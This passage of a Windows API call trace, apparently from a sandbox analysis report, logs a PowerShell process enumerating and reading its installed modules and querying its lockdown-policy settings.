cAlternateFileName="")) returned 0x25b73cd2c10 [0281.057] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.058] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0281.058] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.058] FindClose (in: hFindFile=0x25b73cd2c10 | out: hFindFile=0x25b73cd2c10) returned 1 [0281.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.058] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c680, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0281.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cad0) returned 1 [0281.058] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cbb0 | out: lpFileInformation=0x653ef8cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0281.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca90) returned 1 [0281.058] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c390, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0281.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c870) returned 1 [0281.058] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x948 [0281.058] GetFileType (hFile=0x948) returned 0x1 [0281.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7e0) returned 1 [0281.059] GetFileType (hFile=0x948) returned 0x1 [0281.059] ReadFile (in: hFile=0x948, lpBuffer=0x25b5c7265e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7265e0*, lpNumberOfBytesRead=0x653ef8c948*=0x1000, lpOverlapped=0x0) returned 1 [0281.059] ReadFile (in: hFile=0x948, lpBuffer=0x25b5c7265e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7265e0*, lpNumberOfBytesRead=0x653ef8c948*=0x1000, lpOverlapped=0x0) returned 1 [0281.059] ReadFile (in: hFile=0x948, lpBuffer=0x25b5c7265e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7265e0*, lpNumberOfBytesRead=0x653ef8c948*=0x1000, lpOverlapped=0x0) returned 1 [0281.059] ReadFile (in: hFile=0x948, lpBuffer=0x25b5c7265e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7265e0*, lpNumberOfBytesRead=0x653ef8c948*=0x5e5, lpOverlapped=0x0) returned 1 [0281.059] ReadFile (in: hFile=0x948, lpBuffer=0x25b5c725b05, nNumberOfBytesToRead=0x21b, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c725b05*, lpNumberOfBytesRead=0x653ef8c948*=0x0, lpOverlapped=0x0) returned 1 [0281.059] ReadFile (in: hFile=0x948, lpBuffer=0x25b5c7265e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7265e0*, lpNumberOfBytesRead=0x653ef8c948*=0x0, lpOverlapped=0x0) returned 1 [0281.060] CloseHandle (hObject=0x948) returned 1 [0281.114] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0281.114] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0281.114] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0281.114] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0281.115] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0281.115] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.116] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.116] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0281.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0281.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0281.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0281.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0281.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0281.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8d0) returned 1 [0281.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0281.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0281.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c850) returned 1 [0281.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c810) returned 1 [0281.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cad0) returned 1 [0281.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca90) returned 1 [0281.119] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c390, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0281.119] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c870) returned 1 [0281.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7e0) returned 1 [0281.121] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0281.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0281.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0281.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0281.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0281.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0281.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0281.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c730) returned 1 [0281.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c660) returned 1 [0281.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c620) returned 1 [0281.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c730) returned 1 [0281.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c660) returned 1 [0281.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c620) returned 1 [0281.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c740) returned 1 [0281.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c700) returned 1 [0281.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c790) returned 1 [0281.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c6c0) returned 1 [0281.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c680) returned 1 [0281.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8d0) returned 1 [0281.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0281.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0281.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c850) returned 1 [0281.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c810) returned 1 [0281.124] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.124] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cad0) returned 1 [0281.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca90) returned 1 [0281.125] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c390, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0281.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c870) returned 1 [0281.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7e0) returned 1 [0281.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbf0) returned 1 [0281.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cbb0) returned 1 [0281.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cc40) returned 1 [0281.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb70) returned 1 [0281.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb30) returned 1 [0281.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbe0) returned 1 [0281.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb10) returned 1 [0281.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cad0) returned 1 [0281.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbe0) returned 1 [0281.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb10) returned 1 [0281.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cad0) returned 1 [0281.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.130] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.130] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.130] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.153] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfcc20 [0281.153] GetSystemDirectoryW (in: lpBuffer=0x25b73cfcc20, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0281.153] CoTaskMemFree (pv=0x25b73cfcc20) [0281.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x653ef8c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0281.153] WldpGetLockdownPolicy () returned 0x0 [0281.153] GetSystemInfo (in: lpSystemInfo=0x653ef8cb70 | out: lpSystemInfo=0x653ef8cb70*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0281.154] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8ca78 | out: phkResult=0x653ef8ca78*=0x948) returned 0x0 [0281.154] RegQueryValueExW (in: hKey=0x948, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x653ef8cac8, lpData=0x0, lpcbData=0x653ef8cac0*=0x0 | out: lpType=0x653ef8cac8*=0x0, lpData=0x0, lpcbData=0x653ef8cac0*=0x0) returned 0x2 [0281.154] RegCloseKey (hKey=0x948) returned 0x0 [0281.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0281.158] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d01ce0 [0281.158] GetSystemDirectoryW (in: lpBuffer=0x25b73d01ce0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0281.158] CoTaskMemFree (pv=0x25b73d01ce0) [0281.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x653ef8c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0281.158] WldpGetLockdownPolicy () returned 0x0 [0281.158] GetSystemInfo (in: lpSystemInfo=0x653ef8c9d0 | out: lpSystemInfo=0x653ef8c9d0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0281.158] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8c8d8 | out: phkResult=0x653ef8c8d8*=0x7f4) returned 0x0 [0281.158] RegQueryValueExW (in: hKey=0x7f4, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x653ef8c928, lpData=0x0, lpcbData=0x653ef8c920*=0x0 | out: lpType=0x653ef8c928*=0x0, lpData=0x0, lpcbData=0x653ef8c920*=0x0) returned 0x2 [0281.159] RegCloseKey (hKey=0x7f4) returned 0x0 [0281.159] CloseHandle (hObject=0x948) returned 1 [0281.162] CoCreateGuid (in: pguid=0x653ef8ca88 | out: pguid=0x653ef8ca88*(Data1=0xd2c5a687, Data2=0xe21e, Data3=0x413e, Data4=([0]=0xbc, [1]=0x43, [2]=0xc7, [3]=0xbd, [4]=0x9c, [5]=0xe4, [6]=0x5, [7]=0xc0))) returned 0x0 [0281.227] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: 